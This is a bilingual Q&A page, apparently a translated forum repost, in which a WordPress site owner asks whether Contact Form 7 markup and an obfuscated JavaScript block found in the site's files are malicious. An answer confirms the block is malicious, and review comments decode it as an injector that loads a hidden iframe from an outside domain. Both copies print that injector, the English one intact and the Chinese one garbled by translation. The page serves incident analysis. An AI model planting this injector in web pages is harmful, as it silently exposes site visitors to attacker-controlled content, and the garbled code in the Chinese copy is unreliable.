网站 hxxp 上的恶意软件看起来很可疑 [英] Malware on website hxxp looks suspicious

本文介绍了网站 hxxp 上的恶意软件看起来很可疑的处理方法,对大家解决问题具有一定的参考价值,需要的朋友们下面随着小编来一起学习吧!

问题描述

谷歌在我们的网站上检测到恶意文件/恶意软件,我用 redleg 检查过,其中一些值显示为黄色..

<!-- NOTE(review): hidden fields named _wpcf7, _wpcf7_version, _wpcf7_locale, _wpcf7_unit_tag plus a _wpnonce are what the Contact Form 7 plugin emits for its own form; the nonce is WordPress's request-forgery token and is expected in a form. This appears to be legitimate plugin markup rather than an injection (confirm against a clean copy of the plugin). -->
<input type="hidden" name="_wpcf7" value="41"/><input type="hidden" name="_wpcf7_version" value="4.3"/><input type="hidden" name="_wpcf7_locale" value=""/><input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f41-o1"/><input type="hidden" name="_wpnonce" value="649583a56e"/>

附注.为了安全和隐私,我将此处的网站链接更改为我们的网站

<代码></脚本?<sc?ript type='text/javascript'>/* <![CDATA[ */var _wpcf7 = {"loaderUrl":"http:\/\/ourwebsite.com\/wp-content\/plugins\/contact-form-7\/images\/ajax-loader.gif","sending":"正在发送..."};/* ]]>*/</脚本?<sc?ript type='text/javascript' src=hxxp://ourwebsite.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=52e4c650d67bb1484c4a926e5a0eccaf'></脚本?

谁能判断这些脚本是否具有恶意..

我所做的是从我所有的 .js 文件中删除所有这些脚本

/*dd58e691432e362d70bf5b7534f31b87*/var _0xacbd=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65","\x73\x65\x74\x44\x61\x74\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","","\x3D\x28\x5B\x5E\x3B\x5D\x29\x7B\x31\x2C\x7D","\x65\x78\x65\x63"、"\x73\x70\x6C\x69\x74"、"\x61\x64\x2D\x63\x6F\x6F\x6B\x69\x65"、"\x65\x72\x32\x76\x64\x72\x35\x67\x64\x63\x33\x64\x73","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x61\x74\x73\x2E\x62\x61\x6C\x77\x35\x6\x7A\x76\x69\x63\x7A\x37\x68\x6B\x61\x2E\x70\x77\x2F\x3F\x69\x64\x3D\x36\x39\x34\x37\x36\x32\x67\\x6B\x65\x79\x77\x6F\x72\x64\x3D","\x26\x61\x64\x5F\x69\x64\x3D\x58\x6E\x35\x62\x65\x34","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x27\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x31\x3x30\x30\x3B\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x3B\x6C\x65\x66\x74\x3A\x2D\x39\x39\x39\x39\x70\x78\x3B\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\\x73\x72\x63\x3D\x27","\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];window[_0xacbd[0]]=function(){function_0x78a6x1(_0x78a6x2,_0x78a6x3,_0x78a6x4){if(_0x78a6x4){var _0x78a6x5= 新日期();_0x78a6x5[_0xacbd[2]](_0x78a6x5[_6a](x7a6x5[_6]&7a)(x78a6x5[_6]&7a;x8(x)&8;x78a6x5[_0x];8_0x78a6x3){document[_0xacbd[3]]=_0x78a6x2+_0xacbd[4]+_0x78a6x3+(_0x78a6x4?_0xacbd[5]+_0x78a6x5[_0xacbd}el][6])(返回{6}xacbd:[6]];函数_0x78a6x6(_0x78a6x2){var _0x78a6x3=新正则表达式(_0x78a6x2+_0xacbd[8]);var _0x78a6x4=_0x78a6x3[_0xacbd[9]](document[0x7a)[x7a)[x7a](x7a)[0x7a)[0x7a](x7a)[0x7a)[0x7a](x7a)[0x7a](x7a)[0x7a][_3]]][_0xacbd[10]](_0xacbd[4])}else {return false};return _0x78a6x4[1]?_0x78a6x4[1]:false;}var _0x78a6x7=_0x78a6x6(_0xacbd!8_x7x7);_0xacbd[12]){_0x78a6x1(_0xacbd[11],_0xacbd[12],1);var 
_0x78a6x8=文档[_0xacbd[14]](_0xacbd[13]);var _0x78a6x9=983755;var _0x78a6xa=_0xacbd[15]+_0x78a6x9+_0xacbd[16];_0x78a6x8[_0xacbd[17]];xacbd[17]0xacbd[17][xacbd[17]]=0xacbd[15]+_021]][_0xacbd[20]](_0x78a6x8);};};/*dd58e691432e362d70bf5b7534f31b87*/

解决方案

我的杀毒软件 (ESet Endpoint Security 5.0.2) 将上述 javascript var 块代码检测为木马病毒,并在启用防病毒软件时拒绝加载此页面.这是一个很好的迹象,说明这确实是一个糟糕的代码块.

所以回答您的问题,是的,您发布的代码确实是恶意的.

Google has detected a malicious file/malware on our website. I checked it with redleg, and some of these values are displayed in yellow..

<!-- NOTE(review): this hidden <div> holds the Contact Form 7 plugin's own bookkeeping fields (form id, plugin version, locale, unit tag) and a WordPress _wpnonce request-forgery token. Hidden inputs like these are normal for a CF7 form and by themselves are not an indicator of compromise; the injected code on this page is the obfuscated _0xacbd block further down. -->
<div style=" display: none ;">
<input type="hidden" name="_wpcf7" value="41" />
<input type="hidden" name="_wpcf7_version" value="4.3" />
<input type="hidden" name="_wpcf7_locale" value="" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f41-o1" />
<input type="hidden" name="_wpnonce" value="649583a56e" />
  </div> 

PS. For security and privacy reasons, I changed our website's links here to "ourwebsite".

<!-- NOTE(review): both script includes resolve under the site's own wp-content/plugins/contact-form-7/ path and the inline _wpcf7 object only carries the plugin's loader image URL and a "sending" label; this matches what Contact Form 7 emits for its forms and appears to be first-party plugin output, not an injection. The "sc?ript" spelling is the poster's defanging. Worth checking nonetheless: compare scripts.js and jquery.form.min.js on disk against a clean plugin download, since the injected _0xacbd block below was found inside .js files. -->
< sc?ript type='text/javascript' src=hxxp://ourwebsite.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=52e4c650d67bb1484c4a926e5a0eccaf-2014.06.20'> < / sc?ript >
 < sc?ript type='text/javascript'>
 /* < ![CDATA[ */
 var _wpcf7 = {"loaderUrl":"http:\/\/ourwebsite.com\/wp-content\/plugins\/contact-form-7\/images\/ajax-loader.gif","sending":"Sending ..."};
 /* ]]> */
 < / sc?ript >
< sc?ript type='text/javascript' src=hxxp://ourwebsite.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=52e4c650d67bb1484c4a926e5a0eccaf'> < / sc?ript >

Can someone tell whether these scripts look malicious?

What I did was delete all of this script from all my .js files:

 /*dd58e691432e362d70bf5b7534f31b87*/
 /*
  * NOTE(review): obfuscated injector, annotated here for analysis only.
  * The _0xacbd string table decodes (from its \x hex escapes) to:
  *   [0] "onload"        [1] "getDate"    [2] "setDate"   [3] "cookie"   [4] "="
  *   [5] "; expires="    [6] "toUTCString"   [7] ""   [8] "=([^;]){1,}"   [9] "exec"
  *   [10] "split"   [11] "ad-cookie"   [12] "er2vdr5gdc3ds"   [13] "div"   [14] "createElement"
  *   [15] "hxxp://stats[.]balw5ezvicz7hka[.]pw/?id=6947627&keyword="   (defanged)
  *   [16] "&ad_id=Xn5be4"   [17] "innerHTML"
  *   [18] "<div style='position:absolute;z-index:1000;top:-1000px;left:-9999px;'><iframe src='"
  *   [19] "'></iframe></div>"   [20] "appendChild"   [21] "body"
  *
  * Read with those values substituted, the handler assigned to window.onload:
  *   - _0x78a6x1(name, value, days): cookie setter; writes document.cookie as
  *     name + "=" + value and, when days is given, appends "; expires=" + a date
  *     that many days ahead (toUTCString). Returns false if name or value is falsy.
  *   - _0x78a6x6(name): cookie reader; runs new RegExp(name + "=([^;]){1,}") against
  *     document.cookie, splits the match on "=", returns the value or false.
  *   - Then: if the cookie "ad-cookie" is not "er2vdr5gdc3ds", it is set for 1 day and
  *     a <div> is created whose innerHTML is an off-screen wrapper containing an
  *     <iframe> whose src is string [15] + 983755 + string [16]; that div is appended
  *     to document.body. Net effect: every visitor silently loads a hidden third-party
  *     frame from the domain above, at most once per day per browser (the cookie is
  *     the throttle, not a security control).
  * Defender notes: the domain in [15] and the two MD5-looking marker comments that
  * bracket the snippet are the useful indicators here; the markers look like a tag the
  * injector uses to find its own payload, so grep every .js/.php file for that hash
  * string rather than for the variable names. Removing the snippet from .js files fixes
  * the symptom only; whatever had write access to those files (outdated plugin/theme,
  * leaked credentials, a web shell) is still to be found, and the domain is worth
  * blocking at the proxy/DNS layer while that happens.
  */
 var _0xacbd=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65","\x73\x65\x74\x44\x61\x74\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","","\x3D\x28\x5B\x5E\x3B\x5D\x29\x7B\x31\x2C\x7D","\x65\x78\x65\x63","\x73\x70\x6C\x69\x74","\x61\x64\x2D\x63\x6F\x6F\x6B\x69\x65","\x65\x72\x32\x76\x64\x72\x35\x67\x64\x63\x33\x64\x73","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x61\x74\x73\x2E\x62\x61\x6C\x77\x35\x65\x7A\x76\x69\x63\x7A\x37\x68\x6B\x61\x2E\x70\x77\x2F\x3F\x69\x64\x3D\x36\x39\x34\x37\x36\x32\x37\x26\x6B\x65\x79\x77\x6F\x72\x64\x3D","\x26\x61\x64\x5F\x69\x64\x3D\x58\x6E\x35\x62\x65\x34","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x27\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x31\x30\x30\x30\x3B\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x3B\x6C\x65\x66\x74\x3A\x2D\x39\x39\x39\x39\x70\x78\x3B\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27","\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];window[_0xacbd[0]]=function(){function _0x78a6x1(_0x78a6x2,_0x78a6x3,_0x78a6x4){if(_0x78a6x4){var _0x78a6x5= new Date();_0x78a6x5[_0xacbd[2]](_0x78a6x5[_0xacbd[1]]()+_0x78a6x4);};if(_0x78a6x2&&_0x78a6x3){document[_0xacbd[3]]=_0x78a6x2+_0xacbd[4]+_0x78a6x3+(_0x78a6x4?_0xacbd[5]+_0x78a6x5[_0xacbd[6]]():_0xacbd[7])}else {return false};}function _0x78a6x6(_0x78a6x2){var _0x78a6x3= new RegExp(_0x78a6x2+_0xacbd[8]);var _0x78a6x4=_0x78a6x3[_0xacbd[9]](document[_0xacbd[3]]);if(_0x78a6x4){_0x78a6x4=_0x78a6x4[0][_0xacbd[10]](_0xacbd[4])}else {return false};return _0x78a6x4[1]?_0x78a6x4[1]:false;}var _0x78a6x7=_0x78a6x6(_0xacbd[11]);if(_0x78a6x7!=_0xacbd[12]){_0x78a6x1(_0xacbd[11],_0xacbd[12],1);var 
_0x78a6x8=document[_0xacbd[14]](_0xacbd[13]);var _0x78a6x9=983755;var _0x78a6xa=_0xacbd[15]+_0x78a6x9+_0xacbd[16];_0x78a6x8[_0xacbd[17]]=_0xacbd[18]+_0x78a6xa+_0xacbd[19];document[_0xacbd[21]][_0xacbd[20]](_0x78a6x8);};};
 /*dd58e691432e362d70bf5b7534f31b87*/

解决方案

My antivirus (ESet Endpoint Security 5.0.2) detects the above JavaScript var block as a Trojan and refuses to load this page while the antivirus is enabled. That's a pretty good sign that this is indeed a bad code block.

So, to answer your question: yes, the code you posted is indeed malicious.

